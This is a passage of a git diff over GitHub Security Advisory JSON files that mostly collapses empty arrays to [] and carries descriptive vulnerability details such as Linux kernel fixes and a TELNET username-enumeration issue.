{ "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-482p-8mj7-45f7/GHSA-482p-8mj7-45f7.json b/advisories/unreviewed/2024/03/GHSA-482p-8mj7-45f7/GHSA-482p-8mj7-45f7.json index 5a29bd41a63..7b7a066f563 100644 --- a/advisories/unreviewed/2024/03/GHSA-482p-8mj7-45f7/GHSA-482p-8mj7-45f7.json +++ b/advisories/unreviewed/2024/03/GHSA-482p-8mj7-45f7/GHSA-482p-8mj7-45f7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-5cw3-x746-whwq/GHSA-5cw3-x746-whwq.json b/advisories/unreviewed/2024/03/GHSA-5cw3-x746-whwq/GHSA-5cw3-x746-whwq.json index ad0dea66800..c13591f649d 100644 --- a/advisories/unreviewed/2024/03/GHSA-5cw3-x746-whwq/GHSA-5cw3-x746-whwq.json +++ b/advisories/unreviewed/2024/03/GHSA-5cw3-x746-whwq/GHSA-5cw3-x746-whwq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-5pmc-hpp2-j3rp/GHSA-5pmc-hpp2-j3rp.json b/advisories/unreviewed/2024/03/GHSA-5pmc-hpp2-j3rp/GHSA-5pmc-hpp2-j3rp.json index dab43dde2ef..5de52bb4d2b 100644 --- a/advisories/unreviewed/2024/03/GHSA-5pmc-hpp2-j3rp/GHSA-5pmc-hpp2-j3rp.json +++ b/advisories/unreviewed/2024/03/GHSA-5pmc-hpp2-j3rp/GHSA-5pmc-hpp2-j3rp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-64wc-qrfg-gh7m/GHSA-64wc-qrfg-gh7m.json b/advisories/unreviewed/2024/03/GHSA-64wc-qrfg-gh7m/GHSA-64wc-qrfg-gh7m.json index 8f4e799b17b..d169384d5b3 100644 --- a/advisories/unreviewed/2024/03/GHSA-64wc-qrfg-gh7m/GHSA-64wc-qrfg-gh7m.json +++ b/advisories/unreviewed/2024/03/GHSA-64wc-qrfg-gh7m/GHSA-64wc-qrfg-gh7m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-6ggc-x6gh-4w9h/GHSA-6ggc-x6gh-4w9h.json b/advisories/unreviewed/2024/03/GHSA-6ggc-x6gh-4w9h/GHSA-6ggc-x6gh-4w9h.json index b359405c136..e32573d2ed4 100644 --- a/advisories/unreviewed/2024/03/GHSA-6ggc-x6gh-4w9h/GHSA-6ggc-x6gh-4w9h.json +++ b/advisories/unreviewed/2024/03/GHSA-6ggc-x6gh-4w9h/GHSA-6ggc-x6gh-4w9h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-6p7c-5wg7-g5qx/GHSA-6p7c-5wg7-g5qx.json b/advisories/unreviewed/2024/03/GHSA-6p7c-5wg7-g5qx/GHSA-6p7c-5wg7-g5qx.json index 135efebde6c..31459060fc2 100644 --- a/advisories/unreviewed/2024/03/GHSA-6p7c-5wg7-g5qx/GHSA-6p7c-5wg7-g5qx.json +++ b/advisories/unreviewed/2024/03/GHSA-6p7c-5wg7-g5qx/GHSA-6p7c-5wg7-g5qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-792x-pfwg-f6rr/GHSA-792x-pfwg-f6rr.json b/advisories/unreviewed/2024/03/GHSA-792x-pfwg-f6rr/GHSA-792x-pfwg-f6rr.json index 101d82f78eb..87edc431a76 100644 --- a/advisories/unreviewed/2024/03/GHSA-792x-pfwg-f6rr/GHSA-792x-pfwg-f6rr.json +++ b/advisories/unreviewed/2024/03/GHSA-792x-pfwg-f6rr/GHSA-792x-pfwg-f6rr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-894w-vfm7-w5pv/GHSA-894w-vfm7-w5pv.json b/advisories/unreviewed/2024/03/GHSA-894w-vfm7-w5pv/GHSA-894w-vfm7-w5pv.json index 59c00ba46e9..e4c4b7fea89 100644 --- a/advisories/unreviewed/2024/03/GHSA-894w-vfm7-w5pv/GHSA-894w-vfm7-w5pv.json +++ b/advisories/unreviewed/2024/03/GHSA-894w-vfm7-w5pv/GHSA-894w-vfm7-w5pv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-8mqv-cx74-94cc/GHSA-8mqv-cx74-94cc.json b/advisories/unreviewed/2024/03/GHSA-8mqv-cx74-94cc/GHSA-8mqv-cx74-94cc.json index 7d2542cf987..9395d8785f2 100644 --- a/advisories/unreviewed/2024/03/GHSA-8mqv-cx74-94cc/GHSA-8mqv-cx74-94cc.json +++ b/advisories/unreviewed/2024/03/GHSA-8mqv-cx74-94cc/GHSA-8mqv-cx74-94cc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-92c8-842p-7xgg/GHSA-92c8-842p-7xgg.json b/advisories/unreviewed/2024/03/GHSA-92c8-842p-7xgg/GHSA-92c8-842p-7xgg.json index 3a9d63667c6..6eb6d532e7e 100644 --- a/advisories/unreviewed/2024/03/GHSA-92c8-842p-7xgg/GHSA-92c8-842p-7xgg.json +++ b/advisories/unreviewed/2024/03/GHSA-92c8-842p-7xgg/GHSA-92c8-842p-7xgg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-9f3h-j2gr-9v65/GHSA-9f3h-j2gr-9v65.json b/advisories/unreviewed/2024/03/GHSA-9f3h-j2gr-9v65/GHSA-9f3h-j2gr-9v65.json index 04c711214c8..0aa87e25c23 100644 --- a/advisories/unreviewed/2024/03/GHSA-9f3h-j2gr-9v65/GHSA-9f3h-j2gr-9v65.json +++ b/advisories/unreviewed/2024/03/GHSA-9f3h-j2gr-9v65/GHSA-9f3h-j2gr-9v65.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-9hp2-5m46-r478/GHSA-9hp2-5m46-r478.json b/advisories/unreviewed/2024/03/GHSA-9hp2-5m46-r478/GHSA-9hp2-5m46-r478.json index a9f29dc899a..5a85a30c2e2 100644 --- a/advisories/unreviewed/2024/03/GHSA-9hp2-5m46-r478/GHSA-9hp2-5m46-r478.json +++ b/advisories/unreviewed/2024/03/GHSA-9hp2-5m46-r478/GHSA-9hp2-5m46-r478.json @@ -7,12 +7,8 @@ "CVE-2024-25734" ], "details": "An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered, which might make it easier for remote attackers to enumerate user accounts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-f537-cqwj-27gp/GHSA-f537-cqwj-27gp.json b/advisories/unreviewed/2024/03/GHSA-f537-cqwj-27gp/GHSA-f537-cqwj-27gp.json index c1869932429..70ec5c204b6 100644 --- a/advisories/unreviewed/2024/03/GHSA-f537-cqwj-27gp/GHSA-f537-cqwj-27gp.json +++ b/advisories/unreviewed/2024/03/GHSA-f537-cqwj-27gp/GHSA-f537-cqwj-27gp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-fhrf-5824-hj9w/GHSA-fhrf-5824-hj9w.json b/advisories/unreviewed/2024/03/GHSA-fhrf-5824-hj9w/GHSA-fhrf-5824-hj9w.json index 6e6e7705b14..63e549ad965 100644 --- a/advisories/unreviewed/2024/03/GHSA-fhrf-5824-hj9w/GHSA-fhrf-5824-hj9w.json +++ b/advisories/unreviewed/2024/03/GHSA-fhrf-5824-hj9w/GHSA-fhrf-5824-hj9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-h74m-whwv-f8j4/GHSA-h74m-whwv-f8j4.json b/advisories/unreviewed/2024/03/GHSA-h74m-whwv-f8j4/GHSA-h74m-whwv-f8j4.json index 70c910c5550..a521bf5da1b 100644 --- a/advisories/unreviewed/2024/03/GHSA-h74m-whwv-f8j4/GHSA-h74m-whwv-f8j4.json +++ b/advisories/unreviewed/2024/03/GHSA-h74m-whwv-f8j4/GHSA-h74m-whwv-f8j4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-j83g-jp4j-gx6g/GHSA-j83g-jp4j-gx6g.json b/advisories/unreviewed/2024/03/GHSA-j83g-jp4j-gx6g/GHSA-j83g-jp4j-gx6g.json index 2cd87ef5d37..7d26175d10f 100644 --- a/advisories/unreviewed/2024/03/GHSA-j83g-jp4j-gx6g/GHSA-j83g-jp4j-gx6g.json +++ b/advisories/unreviewed/2024/03/GHSA-j83g-jp4j-gx6g/GHSA-j83g-jp4j-gx6g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-jr26-5gjf-8mpp/GHSA-jr26-5gjf-8mpp.json b/advisories/unreviewed/2024/03/GHSA-jr26-5gjf-8mpp/GHSA-jr26-5gjf-8mpp.json index db84188535d..6d8e01a6de6 100644 --- a/advisories/unreviewed/2024/03/GHSA-jr26-5gjf-8mpp/GHSA-jr26-5gjf-8mpp.json +++ b/advisories/unreviewed/2024/03/GHSA-jr26-5gjf-8mpp/GHSA-jr26-5gjf-8mpp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-p4wc-mhj4-g4gx/GHSA-p4wc-mhj4-g4gx.json b/advisories/unreviewed/2024/03/GHSA-p4wc-mhj4-g4gx/GHSA-p4wc-mhj4-g4gx.json index 883183fefca..11b1de99579 100644 --- a/advisories/unreviewed/2024/03/GHSA-p4wc-mhj4-g4gx/GHSA-p4wc-mhj4-g4gx.json +++ b/advisories/unreviewed/2024/03/GHSA-p4wc-mhj4-g4gx/GHSA-p4wc-mhj4-g4gx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-pr88-vhj7-4qvr/GHSA-pr88-vhj7-4qvr.json b/advisories/unreviewed/2024/03/GHSA-pr88-vhj7-4qvr/GHSA-pr88-vhj7-4qvr.json index baff53fbf26..c7c42e13293 100644 --- a/advisories/unreviewed/2024/03/GHSA-pr88-vhj7-4qvr/GHSA-pr88-vhj7-4qvr.json +++ b/advisories/unreviewed/2024/03/GHSA-pr88-vhj7-4qvr/GHSA-pr88-vhj7-4qvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-pwrv-jh4g-7cjw/GHSA-pwrv-jh4g-7cjw.json b/advisories/unreviewed/2024/03/GHSA-pwrv-jh4g-7cjw/GHSA-pwrv-jh4g-7cjw.json index ea186cf9040..5447a583df2 100644 --- a/advisories/unreviewed/2024/03/GHSA-pwrv-jh4g-7cjw/GHSA-pwrv-jh4g-7cjw.json +++ b/advisories/unreviewed/2024/03/GHSA-pwrv-jh4g-7cjw/GHSA-pwrv-jh4g-7cjw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-q7m2-r3xv-fmr3/GHSA-q7m2-r3xv-fmr3.json b/advisories/unreviewed/2024/03/GHSA-q7m2-r3xv-fmr3/GHSA-q7m2-r3xv-fmr3.json index 6cfa583eb0c..84a84999482 100644 --- a/advisories/unreviewed/2024/03/GHSA-q7m2-r3xv-fmr3/GHSA-q7m2-r3xv-fmr3.json +++ b/advisories/unreviewed/2024/03/GHSA-q7m2-r3xv-fmr3/GHSA-q7m2-r3xv-fmr3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-rchp-3crp-r2v7/GHSA-rchp-3crp-r2v7.json b/advisories/unreviewed/2024/03/GHSA-rchp-3crp-r2v7/GHSA-rchp-3crp-r2v7.json index 4eb4eeaff78..b3f271435b7 100644 --- a/advisories/unreviewed/2024/03/GHSA-rchp-3crp-r2v7/GHSA-rchp-3crp-r2v7.json +++ b/advisories/unreviewed/2024/03/GHSA-rchp-3crp-r2v7/GHSA-rchp-3crp-r2v7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-rhj2-38xr-rmqr/GHSA-rhj2-38xr-rmqr.json b/advisories/unreviewed/2024/03/GHSA-rhj2-38xr-rmqr/GHSA-rhj2-38xr-rmqr.json index 5d7d285c63c..0ad902b1587 100644 --- a/advisories/unreviewed/2024/03/GHSA-rhj2-38xr-rmqr/GHSA-rhj2-38xr-rmqr.json +++ b/advisories/unreviewed/2024/03/GHSA-rhj2-38xr-rmqr/GHSA-rhj2-38xr-rmqr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-vpmw-w5fr-gf3h/GHSA-vpmw-w5fr-gf3h.json b/advisories/unreviewed/2024/03/GHSA-vpmw-w5fr-gf3h/GHSA-vpmw-w5fr-gf3h.json index 4ceeff08599..0208f0d838f 100644 --- a/advisories/unreviewed/2024/03/GHSA-vpmw-w5fr-gf3h/GHSA-vpmw-w5fr-gf3h.json +++ b/advisories/unreviewed/2024/03/GHSA-vpmw-w5fr-gf3h/GHSA-vpmw-w5fr-gf3h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-vw49-gvcg-5chv/GHSA-vw49-gvcg-5chv.json b/advisories/unreviewed/2024/03/GHSA-vw49-gvcg-5chv/GHSA-vw49-gvcg-5chv.json index 8ca2682776a..306362bc1a0 100644 --- a/advisories/unreviewed/2024/03/GHSA-vw49-gvcg-5chv/GHSA-vw49-gvcg-5chv.json +++ b/advisories/unreviewed/2024/03/GHSA-vw49-gvcg-5chv/GHSA-vw49-gvcg-5chv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-wwgw-w5hw-vm65/GHSA-wwgw-w5hw-vm65.json b/advisories/unreviewed/2024/03/GHSA-wwgw-w5hw-vm65/GHSA-wwgw-w5hw-vm65.json index 12450ce22d0..ff7df6cc515 100644 --- a/advisories/unreviewed/2024/03/GHSA-wwgw-w5hw-vm65/GHSA-wwgw-w5hw-vm65.json +++ b/advisories/unreviewed/2024/03/GHSA-wwgw-w5hw-vm65/GHSA-wwgw-w5hw-vm65.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-8c6w-27gc-g7xg/GHSA-8c6w-27gc-g7xg.json b/advisories/unreviewed/2024/04/GHSA-8c6w-27gc-g7xg/GHSA-8c6w-27gc-g7xg.json index f26bd8e3188..9cb1a0e6bab 100644 --- a/advisories/unreviewed/2024/04/GHSA-8c6w-27gc-g7xg/GHSA-8c6w-27gc-g7xg.json +++ b/advisories/unreviewed/2024/04/GHSA-8c6w-27gc-g7xg/GHSA-8c6w-27gc-g7xg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-9243-vfr2-5rcw/GHSA-9243-vfr2-5rcw.json b/advisories/unreviewed/2024/04/GHSA-9243-vfr2-5rcw/GHSA-9243-vfr2-5rcw.json index 7cd6c921469..328450c9400 100644 --- a/advisories/unreviewed/2024/04/GHSA-9243-vfr2-5rcw/GHSA-9243-vfr2-5rcw.json +++ b/advisories/unreviewed/2024/04/GHSA-9243-vfr2-5rcw/GHSA-9243-vfr2-5rcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-cxq5-8mc6-xprf/GHSA-cxq5-8mc6-xprf.json b/advisories/unreviewed/2024/04/GHSA-cxq5-8mc6-xprf/GHSA-cxq5-8mc6-xprf.json index d629448e83f..45c45e1cd2c 100644 --- a/advisories/unreviewed/2024/04/GHSA-cxq5-8mc6-xprf/GHSA-cxq5-8mc6-xprf.json +++ b/advisories/unreviewed/2024/04/GHSA-cxq5-8mc6-xprf/GHSA-cxq5-8mc6-xprf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json b/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json index 365b16f4c19..c144488f623 100644 --- a/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json +++ b/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-mq9r-62m5-pjc2/GHSA-mq9r-62m5-pjc2.json b/advisories/unreviewed/2024/04/GHSA-mq9r-62m5-pjc2/GHSA-mq9r-62m5-pjc2.json index 755d622bc04..f3a4c32534c 100644 --- a/advisories/unreviewed/2024/04/GHSA-mq9r-62m5-pjc2/GHSA-mq9r-62m5-pjc2.json +++ b/advisories/unreviewed/2024/04/GHSA-mq9r-62m5-pjc2/GHSA-mq9r-62m5-pjc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-pcqx-8h4p-6r69/GHSA-pcqx-8h4p-6r69.json b/advisories/unreviewed/2024/04/GHSA-pcqx-8h4p-6r69/GHSA-pcqx-8h4p-6r69.json index 2b85f702b7e..7162248507f 100644 --- a/advisories/unreviewed/2024/04/GHSA-pcqx-8h4p-6r69/GHSA-pcqx-8h4p-6r69.json +++ b/advisories/unreviewed/2024/04/GHSA-pcqx-8h4p-6r69/GHSA-pcqx-8h4p-6r69.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-2277-9x7j-58f3/GHSA-2277-9x7j-58f3.json b/advisories/unreviewed/2024/05/GHSA-2277-9x7j-58f3/GHSA-2277-9x7j-58f3.json index 3845465dd57..44d82fa68d7 100644 --- a/advisories/unreviewed/2024/05/GHSA-2277-9x7j-58f3/GHSA-2277-9x7j-58f3.json +++ b/advisories/unreviewed/2024/05/GHSA-2277-9x7j-58f3/GHSA-2277-9x7j-58f3.json @@ -7,12 +7,8 @@ "CVE-2021-47283" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet:sfc: fix non-freed irq in legacy irq mode\n\nSFC driver can be configured via modparam to work using MSI-X, MSI or\nlegacy IRQ interrupts. In the last one, the interrupt was not properly\nreleased on module remove.\n\nIt was not freed because the flag irqs_hooked was not set during\ninitialization in the case of using legacy IRQ.\n\nExample of (trimmed) trace during module remove without this fix:\n\nremove_proc_entry: removing non-empty directory 'irq/125', leaking at least '0000:3b:00.1'\nWARNING: CPU: 39 PID: 3658 at fs/proc/generic.c:715 remove_proc_entry+0x15c/0x170\n...trimmed...\nCall Trace:\n unregister_irq_proc+0xe3/0x100\n free_desc+0x29/0x70\n irq_free_descs+0x47/0x70\n mp_unmap_irq+0x58/0x60\n acpi_unregister_gsi_ioapic+0x2a/0x40\n acpi_pci_irq_disable+0x78/0xb0\n pci_disable_device+0xd1/0x100\n efx_pci_remove+0xa1/0x1e0 [sfc]\n pci_device_remove+0x38/0xa0\n __device_release_driver+0x177/0x230\n driver_detach+0xcb/0x110\n bus_remove_driver+0x58/0xd0\n pci_unregister_driver+0x2a/0xb0\n efx_exit_module+0x24/0xf40 [sfc]\n __do_sys_delete_module.constprop.0+0x171/0x280\n ? exit_to_user_mode_prepare+0x83/0x1d0\n do_syscall_64+0x3d/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f9f9385800b\n...trimmed...", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-27rv-f8p8-59gg/GHSA-27rv-f8p8-59gg.json b/advisories/unreviewed/2024/05/GHSA-27rv-f8p8-59gg/GHSA-27rv-f8p8-59gg.json index 7dc5b2f56c8..6c2c20ad20e 100644 --- a/advisories/unreviewed/2024/05/GHSA-27rv-f8p8-59gg/GHSA-27rv-f8p8-59gg.json +++ b/advisories/unreviewed/2024/05/GHSA-27rv-f8p8-59gg/GHSA-27rv-f8p8-59gg.json @@ -7,12 +7,8 @@ "CVE-2021-47366" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nafs: Fix corruption in reads at fpos 2G-4G from an OpenAFS server\n\nAFS-3 has two data fetch RPC variants, FS.FetchData and FS.FetchData64, and\nLinux's afs client switches between them when talking to a non-YFS server\nif the read size, the file position or the sum of the two have the upper 32\nbits set of the 64-bit value.\n\nThis is a problem, however, since the file position and length fields of\nFS.FetchData are *signed* 32-bit values.\n\nFix this by capturing the capability bits obtained from the fileserver when\nit's sent an FS.GetCapabilities RPC, rather than just discarding them, and\nthen picking out the VICED_CAPABILITY_64BITFILES flag. This can then be\nused to decide whether to use FS.FetchData or FS.FetchData64 - and also\nFS.StoreData or FS.StoreData64 - rather than using upper_32_bits() to\nswitch on the parameter values.\n\nThis capabilities flag could also be used to limit the maximum size of the\nfile, but all servers must be checked for that.\n\nNote that the issue does not exist with FS.StoreData - that uses *unsigned*\n32-bit values. It's also not a problem with Auristor servers as its\nYFS.FetchData64 op uses unsigned 64-bit values.\n\nThis can be tested by cloning a git repo through an OpenAFS client to an\nOpenAFS server and then doing \"git status\" on it from a Linux afs\nclient[1]. Provided the clone has a pack file that's in the 2G-4G range,\nthe git status will show errors like:\n\n\terror: packfile .git/objects/pack/pack-5e813c51d12b6847bbc0fcd97c2bca66da50079c.pack does not match index\n\terror: packfile .git/objects/pack/pack-5e813c51d12b6847bbc0fcd97c2bca66da50079c.pack does not match index\n\nThis can be observed in the server's FileLog with something like the\nfollowing appearing:\n\nSun Aug 29 19:31:39 2021 SRXAFS_FetchData, Fid = 2303380852.491776.3263114, Host 192.168.11.201:7001, Id 1001\nSun Aug 29 19:31:39 2021 CheckRights: len=0, for host=192.168.11.201:7001\nSun Aug 29 19:31:39 2021 FetchData_RXStyle: Pos 18446744071815340032, Len 3154\nSun Aug 29 19:31:39 2021 FetchData_RXStyle: file size 2400758866\n...\nSun Aug 29 19:31:40 2021 SRXAFS_FetchData returns 5\n\nNote the file position of 18446744071815340032. This is the requested file\nposition sign-extended.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-28c9-mq9x-7pcr/GHSA-28c9-mq9x-7pcr.json b/advisories/unreviewed/2024/05/GHSA-28c9-mq9x-7pcr/GHSA-28c9-mq9x-7pcr.json index ad85f2bef0b..24fb5c2152d 100644 --- a/advisories/unreviewed/2024/05/GHSA-28c9-mq9x-7pcr/GHSA-28c9-mq9x-7pcr.json +++ b/advisories/unreviewed/2024/05/GHSA-28c9-mq9x-7pcr/GHSA-28c9-mq9x-7pcr.json @@ -7,12 +7,8 @@ "CVE-2021-47296" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: PPC: Fix kvm_arch_vcpu_ioctl vcpu_load leak\n\nvcpu_put is not called if the user copy fails. This can result in preempt\nnotifier corruption and crashes, among other issues.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-29rx-6chj-44xc/GHSA-29rx-6chj-44xc.json b/advisories/unreviewed/2024/05/GHSA-29rx-6chj-44xc/GHSA-29rx-6chj-44xc.json index fce375aef9f..b6ed1cceb8e 100644 --- a/advisories/unreviewed/2024/05/GHSA-29rx-6chj-44xc/GHSA-29rx-6chj-44xc.json +++ 